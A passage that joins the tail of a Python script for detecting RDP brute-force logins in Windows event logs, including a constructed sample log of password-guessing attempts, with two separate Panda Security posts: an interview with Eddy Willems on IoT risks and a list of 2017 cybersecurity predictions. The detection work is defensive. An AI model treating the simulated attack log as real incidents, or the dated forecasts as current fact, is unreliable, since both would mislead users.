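        if ev["eid"] == "4625" and ev["lt"] in RDP_LOGON_TYPES and ev["ip"] != "-":
            per_ip[ev["ip"]].append(ev)

    findings = {}
    for ip, evs in per_ip.items():
        evs.sort(key=lambda e: e["ts"])
        times = [e["ts"] for e in evs]
        # Sliding window: largest number of failures within `window`.
        peak, start = 0, 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak < threshold:
            continue
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        findings[ip] = {
            "failures": len(evs),
            "peak_in_window": peak,
            "users_tried": sorted({e["user"] for e in evs}),
            "first": times[0], "last": times[-1],
            # Automated guessing shows a steady, short cadence between tries.
            "mean_gap_s": sum(gaps) / len(gaps) if gaps else None,
        }
    return findings


# Constructed sample log: one source guessing every 4 s across several
# account names, one legitimate user who mistyped once then logged in,
# and one local console failure that is not RDP.
SAMPLE_LOG = """\
2017-01-15T03:12:00Z EventID=4625 LogonType=10 TargetUserName=administrator IpAddress=203.0.113.45
2017-01-15T03:12:04Z EventID=4625 LogonType=10 TargetUserName=administrator IpAddress=203.0.113.45
2017-01-15T03:12:08Z EventID=4625 LogonType=10 TargetUserName=admin IpAddress=203.0.113.45
2017-01-15T03:12:12Z EventID=4625 LogonType=10 TargetUserName=admin IpAddress=203.0.113.45
2017-01-15T03:12:16Z EventID=4625 LogonType=10 TargetUserName=user IpAddress=203.0.113.45
2017-01-15T03:12:20Z EventID=4625 LogonType=10 TargetUserName=user IpAddress=203.0.113.45
2017-01-15T03:12:24Z EventID=4625 LogonType=3 TargetUserName=backup IpAddress=203.0.113.45
2017-01-15T03:12:28Z EventID=4625 LogonType=3 TargetUserName=backup IpAddress=203.0.113.45
2017-01-15T03:20:11Z EventID=4625 LogonType=10 TargetUserName=jsmith IpAddress=198.51.100.7
2017-01-15T03:20:41Z EventID=4624 LogonType=10 TargetUserName=jsmith IpAddress=198.51.100.7
2017-01-15T04:02:33Z EventID=4625 LogonType=2 TargetUserName=jsmith IpAddress=-
"""

if __name__ == "__main__":
    for ip, s in detect_bruteforce(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {s['failures']} failures, peak {s['peak_in_window']} in window, "
              f"users={s['users_tried']}, mean gap {s['mean_gap_s']:.1f}s")
```

The threshold and window are the knobs to tune per environment: a human mistyping a password produces a handful of failures minutes apart, whereas the attack described above produced hundreds per day at a regular cadence. A source that trips the rule is a candidate for a firewall block, and a 4624 success from the same address after a run of failures is the event to escalate.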


Eddy Willems Interview: Smart Security and the “Internet of Trouble”

For this week’s guest article, Luis Corrons, director of PandaLabs, spoke with Eddy Willems, Security Evangelist at G Data Software AG, about security in the age of the Internet of Things.

Luis Corrons: Over the course of your more than two decades in the world of computer security, you’ve achieved such milestones as being the cofounder of EICAR, working with security forces and major security agencies, writing the entry on viruses in the encyclopedia Encarta, publishing a book, among other things. What dreams do you still have left to accomplish?

Eddy Willems: My main goal from the beginning has always been to help make the (digital) world a safer and better place. That job is not finished yet. To be able to reach a wide public, from beginners to more experienced internet users, I wrote my book ‘Cybergevaar’ (Dutch for Cyberdanger) originally in my native language. After that it has been translated into German. But for it to have a maximum effect, I really want it to be published in the most widely spoken languages in the world like English, Spanish or even Chinese. That really is a dream I still want to accomplish. It would be nice if we could make the world a little bit safer and at the same time make life a little bit harder for cyber criminals with the help of this book.

Another ambition that fits into my dream of making the world a safer place, is to get rid of bad tests and increase the quality of tests of security products. Correct tests are very important for the users but also for the vendors who create the products. Correct tests will finally lead to improved and better security products and by that finally to a safer world. That’s the reason why I am also involved in AMTSO (Anti Malware Testing Standards Organization). There is still a lot to do in that area.

LC: Since the beginning of 2010 you’ve been working as a Security Evangelist for the security company G Data Software AG. How would you define your position and what are your responsibilities?

EW: In my position as Security Evangelist at G DATA, I’m forming the link between technical complexity and the average Joe. I am responsible for a clear communication to the security community, press, law enforcement, distributors, resellers and end users. This means, amongst other things that I am responsible for organizing trainings about malware and security, speaking at conferences and consulting associations and companies. Another huge chunk of my work is giving interviews to the press. The public I reach with my efforts is very diverse: it ranges from 12 year olds to 92 year olds, from first time computer users to IT security law makers.

LC: Data that’s been collected over the years leads us to conclude that 18% of companies have suffered malware infections from social networks. What measures can be taken to avoid this? Are social networks really one of the main entry points for malware in companies?

Eddy Willems

EW: Social networks are only one vector of the many infection mechanisms we see these days. Of course we can’t deny that social networks are still responsible for even some recent infections: at the end of November a Locky Ransomware variant was widely spread via Facebook Messenger. But still Facebook, Google, LinkedIn and others have some good protective measures in place to stop a lot of malware already. Surfing the web and spammed phishing or malware mails are still the main entry points for malware in companies. Delayed program and OS updating and patching and overly used administration rights on normal user computers inside companies are key to most security related problems.

LC: What do you believe to be the greatest security problem facing businesses on the Internet? Viruses, data theft, spam…?


EW: The biggest security threat to businesses is targeted phishing mails to specific employees in the company. A professional, well-written phishing mail (in his native language) in which the user is encouraged to open the mail and attachment or to click on a specific link has been seen in a lot of big APT cases as the main entry point to the whole company. These days even a security expert can be tricked into opening such a mail.

Another great threat is data breaches. Most of those are unintentional mistakes made by employees. A lack of awareness and a lack of understanding of technologies and its inherent risks are at the base of this.

Both of these risks boil down to the same thing: the weak link is always an unaware or undertrained employee. The human factor, as I like to call it.

LC: Criminals are always looking to attack the greatest amount of victims possible, be it through the creation of new malware for Android terminals or through older versions that may be more exposed. Do cybercriminals see infecting old devices the same way as infecting new devices? Which is more lucrative?

EW: Android has become the number 2 OS platform for malware after MS Windows. Our latest G DATA report saw an enormous increase in Android related malware in 2016. G DATA saw a new Android malware strain every 9 seconds. That says enough about the importance of the platform. Current analyses by G DATA experts show that drive-by infections are now being used by attackers to infect Android smartphones and tablets as well. Security holes in the Android operating system therefore pose an even more serious threat. The long periods until an update for Android reaches users’ devices in particular can aggravate the problem further. One of the bigger issues is that lots of old Android devices will not receive any updates anymore, bringing the older devices down to the same level of (no) security as Windows XP machines. Cybercriminals will look to the old and new Android OS in the future. Malware for the old Android versions will be more for the masses, but malware for the new Android versions needs to be more cleverly created and is more lucrative if used for targeted attacks on business or governmental targets.

LC: In this age of technological revolution through which we are now living, new services are invented without giving a second thought to the possibility that they may be put to some ill-intentioned use, and are therefore left under-protected. Has the Internet of Things become the main challenge with regard to cybersecurity? Does the use of this technology conflict with user privacy?

EW: I wrote about the Internet of Things already a couple of years ago at the G DATA blog where I predicted that this platform would become one of the main challenges of cybersecurity. In my opinion IoT stands more or less for the Internet of Trouble. Security by design is dearly needed, but we’ve seen the opposite unfortunately in a lot of cases.

IoT is seriously affecting our privacy unfortunately. The amount of data IoT devices are creating is staggering and that data is being reused (or should we say misused). You've undoubtedly agreed to terms of service at some point, but have you ever actually read through that entire document or EULA? For example, an insurance company might gather information from you about your driving habits through a connected car when calculating your insurance rate. The same could happen for health insurance thanks to fitness trackers. Sometimes the vendor states in the EULA that he isn't responsible for data leakage. It brings up the question of whether this conflicts with the new GDPR (General Data Protection Regulation).

I am convinced the Internet of Things will bring about much that is good. I can already hardly live without it. It is already making our lives easier. But IoT is much bigger than we think. It's also built into our cities and infrastructure. We now have the opportunity of bringing fundamental security features into the infrastructure for new technologies when they are still in the development stage. And we need to seize this opportunity. That is 'smart' in my opinion. Besides Smart grids and Smart factories, Smart cities, Smart cars and Smart everything else, we will also need Smart security. I only hope the world has enough security engineers to help create that Smart security.

LC: New trends such as the fingerprint and other biometric techniques used with security in mind are being implemented, especially in the business world. What’s your opinion about the use of these methods? For you, what would the perfect password look like?

EW: Simple, the perfect password is the password I can forget. In an ideal world, I don't need to authenticate myself with other tools anymore except part(s) of my body. It's unbelievable how long it takes to implement this in a good way. The theory has been there for ages and we have the technology now; it's only not perfect enough, which makes it costly to implement in all our devices. After that come the privacy issues related to it, which will possibly postpone the implementation again.

We also need to think about the downside of biometric techniques. If my fingerprint or iris gets copied somehow, I don’t have the option of resetting or changing it. So we will always need to have a combination of authentication factors.

LC: Your book Cybergevaar pitches itself as a sort of information manual on IT security for the general public, offering various tips and advice. What were some of the greatest challenges in outlining a book aimed at every kind of Internet user? What piece of advice on display is most important for you?

EW: One of the big challenges in writing the book was leaving out most of the technical details and still remaining on a level that everyone, including experts and non-technical people, wants to read. I tried to keep a good level by including lots of examples, personal anecdotes, expert opinions and a fictional short story. Keeping all your programs and OS up-to-date and using common sense with everything you do when using your computer and the internet is the best advice you can give to everybody! The real problem most of the time is, as I mentioned before, the human factor.

LC: There’s been some talk of a “new reality”, the omnipresent Internet in every aspect of our lives. From your perspective, is this phenomenon truly necessary?

EW: IoT is just the beginning of it. I think we are very near to that ‘new reality’ even if you don’t like it. Our society will be pushed to it automatically, think about Industry 4.0 and Smart cities. In the future you will only be allowed to buy a car with only these specific Smart features in it or you will not be allowed to drive in specific cities. A smart cooking pan that automatically tracks calories and records your delicious recipes as you cook in real time will only work with your new internet connected Smart cooking platform. The omnipresent internet is maybe not really necessary but you’ll be pushed to it anyway! The only way to escape it will be maybe a vacation island specifically created for it.

LC: What have been for you the worst security violations that have marked a before-and-after in the world of cybersecurity? Do you have any predictions for the near future?

EW: The Elk Cloner virus and the Brain virus back in the eighties ... everything else is just an evolution of it. We probably wouldn't have this interview if nothing had happened 30 years ago or ... maybe it was only a matter of time? Stuxnet was built to sabotage Iran's nuclear program. Regin demonstrates even more the power of a multi-purpose data collection tool. Both were built by state agencies, showing that malware is much more than just a money digging tool for cybercriminals. And of course the Snowden revelations, as they showed us how problematic mass-surveillance is and will be and how it reflects back on our privacy, which is slowly fading away.

Malware will always be there as long as computers (in whatever shape or form they may be around, be it a watch, a refrigerator or a tablet) exist, and that will stay for a long time I think. Cybercrime and 'regular' crime will be more and more combined (e.g. modern bank robberies). Malware will influence our behavior much more (e.g. buying, voting, etc.) and ideas, resulting in money or intelligence loss. Smart devices will be massively misused (again) in DDoS and ransomware attacks (e.g. Smart TVs). And this is only short-term thinking.

The only way forward for the security industry, OS makers, application vendors and IoT designers is to work even closer together to be able to handle all new kinds of attacks, security related issues and malware. We are already doing that to some extent, but we should invest much more in it.


The post Eddy Willems Interview: Smart Security and the “Internet of Trouble” appeared first on Panda Security Mediacenter.

In 2017, less malware and more advanced attacks


The decline in new malware and the increased professionalization of attacks will set the tone in cybersecurity for next year, according to PandaLabs' Cybersecurity Predictions for 2017. Ransomware will account for the majority of attacks, and companies will face a larger number of increasingly advanced intrusions.

As far as cybersecurity goes, we bid farewell to a year replete with high-profile attacks that have jeopardized large corporations and private users. Ransomware attacks from Petya, Trojans such as Gugi for Android, the spyware Pegasus, PunkeyPOS and other large-scale attacks targeting point of sale terminals, as well as the recent DDoS (Distributed Denial of Service) attacks, have affected large organizations and international communication networks.

We rank the most popular attacks of the year, analyzing their evolution and taking a look at the cyber threats that 2017 has in store:


Cybercriminals focus their efforts on those attacks which can rake in the most profit, using more effective tactics and professionalizing their operations in a way that allows them to make quick and easy money in an efficient manner.

Ransomware

This Trojan Horse will take center stage with regard to cybersecurity and will cannibalize other more traditional attacks that are based on data theft. The pursuit of profit is the primary motivation of cybercriminals, and ransomware is the simplest and most effective way to achieve this. Some things never change: victims of this hijacking malware will have to decide whether to pay, or not, to recover their data. Panda Security encourages victims to keep in mind that paying the ransom does not guarantee the total recovery of stolen data.

Attacks on Companies

The number of attacks directed at corporations will increase, and these attacks will become more and more advanced. Companies are already the prime target of cybercriminals, as their information is more valuable than that of private users.

Internet of Things (IoT)

The next cybersecurity nightmare. The technological revolution has ushered in the complete integration of smaller devices into the grid, and these devices can become entry points into corporate networks.

DDoS Attacks

The final months of 2016 witnessed the most powerful DDoS (Distributed Denial of Service) attacks in history. These attacks were carried out by bot networks that relied on thousands of affected IoT devices (IP cameras, routers, etc.). 2017 will see an increase in this kind of attack, which is typically used to blackmail companies or to harm their business (by blocking web access, online shopping, etc.).

Mobile Phones

Focusing on a single OS makes it easier for cybercriminals to pick a target with maximal dissemination and profitability. Android users will get the worst of it in the next 12 months.


The precarious situation with regard to international relations can have huge — and serious — consequences in the field of cybersecurity. Governments will want access to still more information (at a time when encryption is becoming more popular), and intelligence agencies will become still more interested in obtaining information that could benefit industry in their countries. A global situation of this kind could hamper data sharing initiatives in the next year.

Download PandaLabs' Predictions here:




The post In 2017, less malware and more advanced attacks appeared first on Panda Security Mediacenter.